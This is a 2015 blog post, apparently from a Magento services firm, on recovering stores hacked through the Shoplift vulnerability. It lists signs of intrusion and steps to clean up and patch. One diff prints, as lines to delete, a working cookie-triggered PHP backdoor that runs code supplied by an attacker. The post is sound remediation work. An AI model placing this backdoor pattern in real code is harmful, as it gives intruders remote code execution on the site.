Published: June 3, 2015
Last updated:

Magento recovery after Shoplift vulnerability (post SUPEE-5344)

If your Magento store was not yet patched, highly likely it was already compromised / hacked by automatic exploit that gone wild on April 22, 2015. To the date, almost every not yet patched store I see have all signs of intrusion:

  • lib/Varien/Db/Adapter/Pdo/Mysql.php file modified, so patch can not be applied seamlessly:
    $ bash ./PATCH_SUPEE-5344_CE_1.8.0.0_v1-2015-02-10-08-10-38.sh 
    Checking if patch can be applied/reverted successfully...
    ERROR: Patch can't be applied/reverted successfully.
    
    patching file app/code/core/Mage/Admin/Model/Observer.php
    patching file app/code/core/Mage/Core/Controller/Request/Http.php
    patching file app/code/core/Mage/Oauth/controllers/Adminhtml/Oauth/AuthorizeController.php
    patching file app/code/core/Mage/XmlConnect/Model/Observer.php
    patching file lib/Varien/Db/Adapter/Pdo/Mysql.php
    Hunk #1 FAILED at 2834.
    1 out of 1 hunk FAILED -- saving rejects to file lib/Varien/Db/Adapter/Pdo/Mysql.php.rej
    
  • app/code/core/Mage/Cms/controllers/IndexController.php file have a hijacking cookie key installed
  • Magpleasure/Filesystem extension is installed for easy access to filesystem (file upload/PHP code modification) from Backend
  • List of admin users at System > Permissions > Users is extented by one or several new admin users with email in @example.com domain (and many others)
  • List of roles at System > Permissions > Roles is extended and full rights are granted to those admins
As result, such store can be fully managed in any way the intruder want to with full admin rights to any possible aspect including full filesystem access. To prevent your Magento store from abuse and Google ban / blacklisting due to malware, make sure that your Magento is  patched. For detailed instructions on patching you can refer to this article.

If your store was compromised / hacked or have any signs of intrusion listed above use the following steps right now to stop it:
  • save a backup of current version
  • prior to patching, rollback lib/Varien/Db/Adapter/Pdo/Mysql.php to original version that corresponds to your Magento distribution or use already patched version from this article
  • rollback app/code/core/Mage/Cms/controllers/IndexController.php to original version, that corresponds to your Magento version or at least delete the following lines there (highlighted):
    --- app/code/core/Mage/Cms/controllers/IndexController.php      2015-04-22 03:47:49.742344082 +0200
    +++ orig-distr-1.9.0.1/IndexController.php        2015-06-02 10:26:25.197159978 +0200
    @@ -116,14 +116 @@
     }
    -
    -class Mage_Cms_Auth_olx
    -{
    -    public function __construct() {
    -        $auth_cookie = @$_COOKIE['nuwxlskmedlvjfdo3'];
    -        if ($auth_cookie) {
    -            $method = $auth_cookie(@$_COOKIE['nuwxlskmedlvjfdo2']);
    -            $auth = $auth_cookie(@$_COOKIE['nuwxlskmedlvjfdo1']);
    -            $method("/124/e",$auth,124);
    -        }
    -    }
    -}
    -$is_auth = new Mage_Cms_Auth_olx;
    
    
  • delete any unknown users at System > Permissions > Users and revoke their roles at System > Permissions > Roles
  • disable Magpleasure/Filesystem extension or uninstall it via Magento Connect Manager
  • scan your store with our Tester tool and Scan Tool from Magento
Alternatively, you can use our patch installation service, all these actions are included in our standard patch checklist.

Note: These actions can recover only from one particular automatic exploitation which we mostly seen on unpatched Magento installations. If intruder actually used the hole to enter to your installation, he could modify any file and leave any other backdoors for later access.
For detailed investigations, request a full scan or restore whole installation from a backup which was made prior to April 22, 2015 and install all missing Magento patches right after restoration.

If you have any difficulties with solving this problem or got a similar one, please let us know in comments below, so we can find the solution together.

 

Posted in: Magento Maintenance

87 votes, 5.01 avg. rating (99% score)